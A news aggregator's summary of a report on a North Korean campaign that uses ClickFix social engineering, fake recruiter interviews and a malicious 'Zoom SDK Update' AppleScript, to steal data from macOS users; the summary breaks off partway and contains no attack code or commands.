Skip to content
Tech News
← Back to articles

North Korea Uses ClickFix to Target macOS Users' Data

2026-04-16 | original
read original get MacOS Privacy Protection Tool → more articles
Why This Matters

This article highlights how North Korean threat actors are leveraging sophisticated social engineering tactics like ClickFix to target macOS users, aiming to steal valuable data and support their nation’s financial and strategic objectives. The campaign underscores the evolving threat landscape and the importance of user awareness and robust security measures in protecting personal and organizational data.

Key Takeaways

North Korean threat actors are using a ClickFix variant to target macOS users and steal their most valuable data.

Microsoft Threat Intelligence today published research uncovering a macOS-focused cyber campaign attributed to a North Korean threat actor tracked as Sapphire Sleet. Like many campaigns attributed to North Korea, attacks rely on social engineering and, more specifically, ClickFix-style techniques.

ClickFix is a social engineering tactic that grew prominent over the past year. It most often works by inviting a target to an attacker-hosted website or virtual meeting (like Zoom or Teams), but then the target is informed there are technical issues that must be addressed — installing a file or running a shell command. Except that there are no technical issues, and the user is tricked into connecting to attacker infrastructure or installing a malicious binary.

Sherrod DeGrippo, general manager of Global Threat Intelligence at Microsoft, tells Dark Reading that ClickFix is so effective because users are conditioned to accept remote support interactions like clicking prompts, downloading tools, and following instructions. "Attackers exploit this familiarity to make malicious actions feel routine, lowering victim skepticism at the critical moment of compromise," she says.

Related:Critical MCP Integration Flaw Puts NGINX at Risk

While many threat actors around the world have utilized ClickFix by now, it has become a favorite of North Korean actors like Sapphire Sleet. The nation-state group is believed to overlap with threats tracked as UNC1069, APT38, and Stardust Chollima. Sapphire Sleet is focused primarily on financially supporting the North Korean government through cryptocurrency and intellectual property theft.

"In this campaign, Sapphire Sleet takes advantage of user‑initiated execution to establish persistence, harvest credentials, and exfiltrate sensitive data while operating outside traditional macOS security enforcement boundaries," Microsoft's blog post read.

How This macOS ClickFix Attack Works

For the described activity, researchers said Sapphire Sleet would create fake recruiter profiles on social media and professional networking platforms, directly engage targets under the pretense of job opportunities, and then schedule a technical interview.

The "interviewer" then directs the target to install a Zoom SDK update that is named "Zoom SDK Update.scpt." This is a compiled AppleScript file that opens in macOS Script Editor by default. The user is then instructed to click the "Run the Script" button.

... continue reading

Explore topics: clickfix north korea sapphire sleet macos threat intelligence
Related:
KelpDAO suffers $290 million heist tied to Lazarus hackers
macOS 26.5 beta 3 now available, here’s what to expect
North Korea hackers blamed for $290M crypto theft
North Korean hackers blamed for $290M crypto theft
Why macOS27 won't be supporting Intel anymore

© 2026 GoKawiil

About | Editorial Policy | Contact